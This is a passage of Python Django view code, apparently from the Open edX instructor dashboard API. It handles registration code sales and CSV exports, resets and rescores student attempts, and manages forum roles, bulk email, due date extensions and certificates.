content=_(u"Unable to generate redeem codes because of course misconfiguration.")
)
course_mode = paid_modes[0]
course_price = course_mode.min_price
registration_codes = []
for __ in range(course_code_number):
generated_registration_code = save_registration_code(
request.user, course_id, course_mode.slug, invoice=sale_invoice, order=None, invoice_item=invoice_item
)
registration_codes.append(generated_registration_code)
site_name = microsite.get_value('SITE_NAME', 'localhost')
quantity = course_code_number
discount = (float(quantity * course_price) - float(sale_price))
course_url = '{base_url}{course_about}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
course_about=reverse('about_course', kwargs={'course_id': course_id.to_deprecated_string()})
)
dashboard_url = '{base_url}{dashboard}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
dashboard=reverse('dashboard')
)
try:
pdf_file = sale_invoice.generate_pdf_invoice(course, course_price, int(quantity), float(sale_price))
except Exception: # pylint: disable=broad-except
log.exception('Exception at creating pdf file.')
pdf_file = None
from_address = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
context = {
'invoice': sale_invoice,
'site_name': site_name,
'course': course,
'course_price': course_price,
'sub_total': course_price * quantity,
'discount': discount,
'sale_price': sale_price,
'quantity': quantity,
'registration_codes': registration_codes,
'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'course_url': course_url,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
'dashboard_url': dashboard_url,
'contact_email': from_address,
'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
'date': time.strftime("%m/%d/%Y")
}
# composes registration codes invoice email
subject = u'Confirmation and Invoice for {course_name}'.format(course_name=course.display_name)
message = render_to_string('emails/registration_codes_sale_email.txt', context)
invoice_attachment = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', context)
#send_mail(subject, message, from_address, recipient_list, fail_silently=False)
csv_file = StringIO.StringIO()
csv_writer = csv.writer(csv_file)
for registration_code in registration_codes:
full_redeem_code_url = 'http://{base_url}{redeem_code_url}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
redeem_code_url=reverse('register_code_redemption', kwargs={'registration_code': registration_code.code})
)
csv_writer.writerow([registration_code.code, full_redeem_code_url])
finance_email = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
if finance_email:
# append the finance email into the recipient_list
recipient_list.append(finance_email)
# send a unique email for each recipient, don't put all email addresses in a single email
for recipient in recipient_list:
email = EmailMessage()
email.subject = subject
email.body = message
email.from_email = from_address
email.to = [recipient]
email.attach(u'RegistrationCodes.csv', csv_file.getvalue(), 'text/csv')
email.attach(u'Invoice.txt', invoice_attachment, 'text/plain')
if pdf_file is not None:
email.attach(u'Invoice.pdf', pdf_file.getvalue(), 'application/pdf')
else:
file_buffer = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
email.attach(u'pdf_unavailable.txt', file_buffer.getvalue(), 'text/plain')
email.send()
return registration_codes_csv("Registration_Codes.csv", registration_codes)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def active_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Active Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# find all the registration codes in this course
registration_codes_list = CourseRegistrationCode.objects.filter(
course_id=course_id
).order_by('invoice_item__invoice__company_name')
company_name = request.POST['active_company_name']
if company_name:
registration_codes_list = registration_codes_list.filter(invoice_item__invoice__company_name=company_name)
# find the redeemed registration codes if any exist in the db
code_redemption_set = RegistrationCodeRedemption.objects.select_related(
'registration_code', 'registration_code__invoice_item__invoice'
).filter(registration_code__course_id=course_id)
if code_redemption_set.exists():
redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
# exclude the redeemed registration codes from the registration codes list and you will get
# all the registration codes that are active
registration_codes_list = registration_codes_list.exclude(code__in=redeemed_registration_codes)
return registration_codes_csv("Active_Registration_Codes.csv", registration_codes_list)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def spent_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Spent(used) Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# find the redeemed registration codes if any exist in the db
code_redemption_set = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
registration_code__course_id=course_id
)
spent_codes_list = []
if code_redemption_set.exists():
redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
# filter the Registration Codes by course id and the redeemed codes and
# you will get a list of all the spent(Redeemed) Registration Codes
spent_codes_list = CourseRegistrationCode.objects.filter(
course_id=course_id, code__in=redeemed_registration_codes
).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
company_name = request.POST['spent_company_name']
if company_name:
spent_codes_list = spent_codes_list.filter(invoice_item__invoice__company_name=company_name) # pylint: disable=maybe-no-member
csv_type = 'spent'
return registration_codes_csv("Spent_Registration_Codes.csv", spent_codes_list, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_anon_ids(request, course_id): # pylint: disable=unused-argument
"""
Respond with 2-column CSV output of user-id, anonymized-user-id
"""
# TODO: the User.objects query and CSV generation here could be
# centralized into instructor_analytics. Currently instructor_analytics
# has similar functionality but not quite what's needed.
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
def csv_response(filename, header, rows):
"""Returns a CSV http response for the given header and rows (excel/utf-8)."""
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={0}'.format(unicode(filename).encode('utf-8'))
writer = csv.writer(response, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL)
# In practice, there should not be non-ascii data in this query,
# but trying to do the right thing anyway.
encoded = [unicode(s).encode('utf-8') for s in header]
writer.writerow(encoded)
for row in rows:
encoded = [unicode(s).encode('utf-8') for s in row]
writer.writerow(encoded)
return response
students = User.objects.filter(
courseenrollment__course_id=course_id,
).order_by('id')
header = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
rows = [[s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, course_id, save=False)] for s in students]
return csv_response(course_id.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', header, rows)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@common_exceptions_400
@require_level('staff')
@require_post_params(
unique_student_identifier="email or username of student for whom to get progress url"
)
def get_student_progress_url(request, course_id):
"""
Get the progress url of a student.
Limited to staff access.
Takes query parameter unique_student_identifier and if the student exists
returns e.g. {
'progress_url': '/../...'
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
user = get_student_from_identifier(request.POST.get('unique_student_identifier'))
progress_url = reverse('student_progress', kwargs={'course_id': course_id.to_deprecated_string(), 'student_id': user.id})
response_payload = {
'course_id': course_id.to_deprecated_string(),
'progress_url': progress_url,
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(
problem_to_reset="problem urlname to reset"
)
@common_exceptions_400
def reset_student_attempts(request, course_id):
"""
Resets a students attempts counter or starts a task to reset all students
attempts counters. Optionally deletes student state for a problem. Limited
to staff access. Some sub-methods limited to instructor access.
Takes some of the following query paremeters
- problem_to_reset is a urlname of a problem
- unique_student_identifier is an email or username
- all_students is a boolean
requires instructor access
mutually exclusive with delete_module
mutually exclusive with delete_module
- delete_module is a boolean
requires instructor access
mutually exclusive with all_students
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))
student_identifier = request.POST.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.POST.get('all_students', False) in ['true', 'True', True]
delete_module = request.POST.get('delete_module', False) in ['true', 'True', True]
# parameter combinations
if all_students and student:
return HttpResponseBadRequest(
"all_students and unique_student_identifier are mutually exclusive."
)
if all_students and delete_module:
return HttpResponseBadRequest(
"all_students and delete_module are mutually exclusive."
)
# instructor authorization
if all_students or delete_module:
if not has_access(request.user, 'instructor', course):
return HttpResponseForbidden("Requires instructor access.")
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
except InvalidKeyError:
return HttpResponseBadRequest()
response_payload = {}
response_payload['problem_to_reset'] = problem_to_reset
if student:
try:
enrollment.reset_student_attempts(
course_id,
student,
module_state_key,
requesting_user=request.user,
delete_module=delete_module
)
except StudentModule.DoesNotExist:
return HttpResponseBadRequest(_("Module does not exist."))
except sub_api.SubmissionError:
# Trust the submissions API to log the error
error_msg = _("An error occurred while deleting the score.")
return HttpResponse(error_msg, status=500)
response_payload['student'] = student_identifier
elif all_students:
instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)
response_payload['task'] = 'created'
response_payload['student'] = 'All Students'
else:
return HttpResponseBadRequest()
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@common_exceptions_400
def reset_student_attempts_for_entrance_exam(request, course_id): # pylint: disable=invalid-name
"""
Resets a students attempts counter or starts a task to reset all students
attempts counters for entrance exam. Optionally deletes student state for
entrance exam. Limited to staff access. Some sub-methods limited to instructor access.
Following are possible query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
requires instructor access
mutually exclusive with delete_module
- delete_module is a boolean
requires instructor access
mutually exclusive with all_students
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
if not course.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam section.")
)
student_identifier = request.POST.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.POST.get('all_students', False) in ['true', 'True', True]
delete_module = request.POST.get('delete_module', False) in ['true', 'True', True]
# parameter combinations
if all_students and student:
return HttpResponseBadRequest(
_("all_students and unique_student_identifier are mutually exclusive.")
)
if all_students and delete_module:
return HttpResponseBadRequest(
_("all_students and delete_module are mutually exclusive.")
)
# instructor authorization
if all_students or delete_module:
if not has_access(request.user, 'instructor', course):
return HttpResponseForbidden(_("Requires instructor access."))
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
if delete_module:
instructor_task.api.submit_delete_entrance_exam_state_for_student(request, entrance_exam_key, student)
else:
instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(request, entrance_exam_key, student)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
response_payload = {'student': student_identifier or _('All Students'), 'task': 'created'}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_post_params(problem_to_reset="problem urlname to reset")
@common_exceptions_400
def rescore_problem(request, course_id):
"""
Starts a background process a students attempts counter. Optionally deletes student state for a problem.
Limited to instructor access.
Takes either of the following query paremeters
- problem_to_reset is a urlname of a problem
- unique_student_identifier is an email or username
- all_students is a boolean
all_students and unique_student_identifier cannot both be present.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))
student_identifier = request.POST.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.POST.get('all_students') in ['true', 'True', True]
if not (problem_to_reset and (all_students or student)):
return HttpResponseBadRequest("Missing query parameters.")
if all_students and student:
return HttpResponseBadRequest(
"Cannot rescore with all_students and unique_student_identifier."
)
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
except InvalidKeyError:
return HttpResponseBadRequest("Unable to parse problem id")
response_payload = {}
response_payload['problem_to_reset'] = problem_to_reset
if student:
response_payload['student'] = student_identifier
instructor_task.api.submit_rescore_problem_for_student(request, module_state_key, student)
response_payload['task'] = 'created'
elif all_students:
instructor_task.api.submit_rescore_problem_for_all_students(request, module_state_key)
response_payload['task'] = 'created'
else:
return HttpResponseBadRequest()
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
def rescore_entrance_exam(request, course_id):
"""
Starts a background process a students attempts counter for entrance exam.
Optionally deletes student state for a problem. Limited to instructor access.
Takes either of the following query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
all_students and unique_student_identifier cannot both be present.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
student_identifier = request.POST.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.POST.get('all_students') in ['true', 'True', True]
if not course.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam section.")
)
if all_students and student:
return HttpResponseBadRequest(
_("Cannot rescore with all_students and unique_student_identifier.")
)
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
response_payload = {}
if student:
response_payload['student'] = student_identifier
else:
response_payload['student'] = _("All Students")
instructor_task.api.submit_rescore_entrance_exam_for_student(request, entrance_exam_key, student)
response_payload['task'] = 'created'
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_background_email_tasks(request, course_id): # pylint: disable=unused-argument
"""
List background email tasks.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
task_type = 'bulk_course_email'
# Specifying for the history of a single task type
tasks = instructor_task.api.get_instructor_task_history(course_id, task_type=task_type)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_email_content(request, course_id): # pylint: disable=unused-argument
"""
List the content of bulk emails sent
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
task_type = 'bulk_course_email'
# First get tasks list of bulk emails sent
emails = instructor_task.api.get_instructor_task_history(course_id, task_type=task_type)
response_payload = {
'emails': map(extract_email_features, emails),
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_instructor_tasks(request, course_id):
"""
List instructor tasks.
Takes optional query paremeters.
- With no arguments, lists running tasks.
- `problem_location_str` lists task history for problem
- `problem_location_str` and `unique_student_identifier` lists task
history for problem AND student (intersection)
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
problem_location_str = strip_if_string(request.POST.get('problem_location_str', False))
student = request.POST.get('unique_student_identifier', None)
if student is not None:
student = get_student_from_identifier(student)
if student and not problem_location_str:
return HttpResponseBadRequest(
"unique_student_identifier must accompany problem_location_str"
)
if problem_location_str:
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_location_str)
except InvalidKeyError:
return HttpResponseBadRequest()
if student:
# Specifying for a single student's history on this problem
tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key, student)
else:
# Specifying for single problem's history
tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key)
else:
# If no problem or student, just get currently running tasks
tasks = instructor_task.api.get_running_instructor_tasks(course_id)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_entrance_exam_instructor_tasks(request, course_id): # pylint: disable=invalid-name
"""
List entrance exam related instructor tasks.
Takes either of the following query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
student = request.POST.get('unique_student_identifier', None)
if student is not None:
student = get_student_from_identifier(student)
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
if student:
# Specifying for a single student's entrance exam history
tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_id, entrance_exam_key, student)
else:
# Specifying for all student's entrance exam history
tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_id, entrance_exam_key)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_report_downloads(_request, course_id):
"""
List grade CSV files that are available for download for this course.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
response_payload = {
'downloads': [
dict(name=name, url=url, link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)))
for name, url in report_store.links_for(course_id)
]
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def list_financial_report_downloads(_request, course_id):
"""
List grade CSV files that are available for download for this course.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
response_payload = {
'downloads': [
dict(name=name, url=url, link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)))
for name, url in report_store.links_for(course_id)
]
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def export_ora2_data(request, course_id):
"""
Pushes a Celery task which will aggregate ora2 responses for a course into a .csv
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_export_ora2_data(request, course_key)
success_status = _("The ORA data report is being generated.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"An ORA data report generation task is already in "
"progress. Check the 'Pending Tasks' table "
"for the status of the task. When completed, the report "
"will be available for download in the table below."
)
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def calculate_grades_csv(request, course_id):
"""
AlreadyRunningError is raised if the course's grades are already being updated.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_calculate_grades_csv(request, course_key)
success_status = _("The grade report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("The grade report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def problem_grade_report(request, course_id):
"""
Request a CSV showing students' grades for all problems in the
course.
AlreadyRunningError is raised if the course's grades are already being
updated.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_problem_grade_report(request, course_key)
success_status = _("The problem grade report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("A problem grade report is already being generated."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": already_running_status
})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('rolename')
def list_forum_members(request, course_id):
"""
Lists forum members of a certain rolename.
Limited to staff access.
The requesting user must be at least staff.
Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
which is limited to instructors.
Takes query parameter `rolename`.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
has_instructor_access = has_access(request.user, 'instructor', course)
has_forum_admin = has_forum_access(
request.user, course_id, FORUM_ROLE_ADMINISTRATOR
)
rolename = request.POST.get('rolename')
# default roles require either (staff & forum admin) or (instructor)
if not (has_forum_admin or has_instructor_access):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
# EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
return HttpResponseBadRequest("Operation requires instructor access.")
# filter out unsupported for roles
if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized rolename '{}'.".format(rolename)
))
try:
role = Role.objects.get(name=rolename, course_id=course_id)
users = role.users.all().order_by('username')
except Role.DoesNotExist:
users = []
def extract_user_info(user):
""" Convert user to dict for json rendering. """
return {
'username': user.username,
'email': user.email,
'first_name': user.first_name,
'last_name': user.last_name,
}
response_payload = {
'course_id': course_id.to_deprecated_string(),
rolename: map(extract_user_info, users),
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(send_to="sending to whom", subject="subject line", message="message text")
def send_email(request, course_id):
"""
Send an email to self, staff, or everyone involved in a course.
Query Parameters:
- 'send_to' specifies what group the email should be sent to
Options are defined by the CourseEmail model in
lms/djangoapps/bulk_email/models.py
- 'subject' specifies email's subject
- 'message' specifies email's content
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
if not BulkEmailFlag.feature_enabled(course_id):
return HttpResponseForbidden("Email is not enabled for this course.")
targets = json.loads(request.POST.get("send_to"))
subject = request.POST.get("subject")
message = request.POST.get("message")
# allow two branding points to come from Microsites: which CourseEmailTemplate should be used
# and what the 'from' field in the email should be
#
# If these are None (because we are not in a Microsite or they are undefined in Microsite config) than
# the system will use normal system defaults
template_name = microsite.get_value('course_email_template_name')
from_addr = microsite.get_value('course_email_from_addr')
# Create the CourseEmail object. This is saved immediately, so that
# any transaction that has been pending up to this point will also be
# committed.
try:
email = CourseEmail.create(
course_id,
request.user,
targets,
subject, message,
template_name=template_name,
from_addr=from_addr
)
except ValueError as err:
return HttpResponseBadRequest(repr(err))
# Submit the task, so that the correct InstructorTask object gets created (for monitoring purposes)
instructor_task.api.submit_bulk_course_email(request, course_id, email.id)
response_payload = {
'course_id': course_id.to_deprecated_string(),
'success': True,
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(
unique_student_identifier="email or username of user to change access",
rolename="the forum role",
action="'allow' or 'revoke'",
)
@common_exceptions_400
def update_forum_role_membership(request, course_id):
"""
Modify user's forum role.
The requesting user must be at least staff.
Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
which is limited to instructors.
No one can revoke an instructors FORUM_ROLE_ADMINISTRATOR status.
Query parameters:
- `email` is the target users email
- `rolename` is one of [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]
- `action` is one of ['allow', 'revoke']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
has_instructor_access = has_access(request.user, 'instructor', course)
has_forum_admin = has_forum_access(
request.user, course_id, FORUM_ROLE_ADMINISTRATOR
)
unique_student_identifier = request.POST.get('unique_student_identifier')
rolename = request.POST.get('rolename')
action = request.POST.get('action')
# default roles require either (staff & forum admin) or (instructor)
if not (has_forum_admin or has_instructor_access):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
# EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
return HttpResponseBadRequest("Operation requires instructor access.")
if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized rolename '{}'.".format(rolename)
))
user = get_student_from_identifier(unique_student_identifier)
try:
update_forum_role(course_id, user, rolename, action)
except Role.DoesNotExist:
return HttpResponseBadRequest("Role does not exist.")
response_payload = {
'course_id': course_id.to_deprecated_string(),
'action': action,
}
return JsonResponse(response_payload)
@require_POST
def get_user_invoice_preference(request, course_id): # pylint: disable=unused-argument
"""
Gets invoice copy user's preferences.
"""
invoice_copy_preference = True
invoice_preference_value = get_user_preference(request.user, INVOICE_KEY)
if invoice_preference_value is not None:
invoice_copy_preference = invoice_preference_value == 'True'
return JsonResponse({
'invoice_copy': invoice_copy_preference
})
def _display_unit(unit):
"""
Gets string for displaying unit to user.
"""
name = getattr(unit, 'display_name', None)
if name:
return u'{0} ({1})'.format(name, unit.location.to_deprecated_string())
else:
return unit.location.to_deprecated_string()
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student', 'url', 'due_datetime')
def change_due_date(request, course_id):
"""
Grants a due date extension to a student for a particular unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
student = require_student_from_identifier(request.POST.get('student'))
unit = find_unit(course, request.POST.get('url'))
due_date = parse_datetime(request.POST.get('due_datetime'))
set_due_date_extension(course, unit, student, due_date)
return JsonResponse(_(
'Successfully changed due date for student {0} for {1} '
'to {2}').format(student.profile.name, _display_unit(unit),
due_date.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student', 'url')
def reset_due_date(request, course_id):
"""
Rescinds a due date extension for a student on a particular unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
student = require_student_from_identifier(request.POST.get('student'))
unit = find_unit(course, request.POST.get('url'))
set_due_date_extension(course, unit, student, None)
if not getattr(unit, "due", None):
# It's possible the normal due date was deleted after an extension was granted:
return JsonResponse(
_("Successfully removed invalid due date extension (unit has no due date).")
)
original_due_date_str = unit.due.strftime('%Y-%m-%d %H:%M')
return JsonResponse(_(
'Successfully reset due date for student {0} for {1} '
'to {2}').format(student.profile.name, _display_unit(unit),
original_due_date_str))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('url')
def show_unit_extensions(request, course_id):
"""
Shows all of the students which have due date extensions for the given unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
unit = find_unit(course, request.POST.get('url'))
return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student')
def show_student_extensions(request, course_id):
"""
Shows all of the due date extensions granted to a particular student in a
particular course.
"""
student = require_student_from_identifier(request.POST.get('student'))
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
return JsonResponse(dump_student_extensions(course, student))
def _split_input_list(str_list):
"""
Separate out individual student email from the comma, or space separated string.
e.g.
in: "Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed"
out: ['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed']
`str_list` is a string coming from an input text area
returns a list of separated values
"""
new_list = re.split(r'[\n\r\s,]', str_list)
new_list = [s.strip() for s in new_list]
new_list = [s for s in new_list if s != '']
return new_list
def _instructor_dash_url(course_key, section=None):
"""Return the URL for a section in the instructor dashboard.
Arguments:
course_key (CourseKey)
Keyword Arguments:
section (str): The name of the section to load.
Returns:
unicode: The URL of a section in the instructor dashboard.
"""
url = reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)})
if section is not None:
url += u'#view-{section}'.format(section=section)
return url
@require_global_staff
@require_POST
def generate_example_certificates(request, course_id=None): # pylint: disable=unused-argument
"""Start generating a set of example certificates.
Example certificates are used to verify that certificates have
been configured correctly for the course.
Redirects back to the intructor dashboard once certificate
generation has begun.
"""
course_key = CourseKey.from_string(course_id)
certs_api.generate_example_certificates(course_key)
return redirect(_instructor_dash_url(course_key, section='certificates'))
@require_global_staff
@require_POST
def enable_certificate_generation(request, course_id=None):
"""Enable/disable self-generated certificates for a course.
Once self-generated certificates have been enabled, students
who have passed the course will be able to generate certificates.
Redirects back to the intructor dashboard once the
setting has been updated.
"""
course_key = CourseKey.from_string(course_id)
is_enabled = (request.POST.get('certificates-enabled', 'false') == 'true')
certs_api.set_cert_generation_enabled(course_key, is_enabled)
return redirect(_instructor_dash_url(course_key, section='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def mark_student_can_skip_entrance_exam(request, course_id): # pylint: disable=invalid-name
"""
Mark a student to skip entrance exam.
Takes `unique_student_identifier` as required POST parameter.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
student_identifier = request.POST.get('unique_student_identifier')
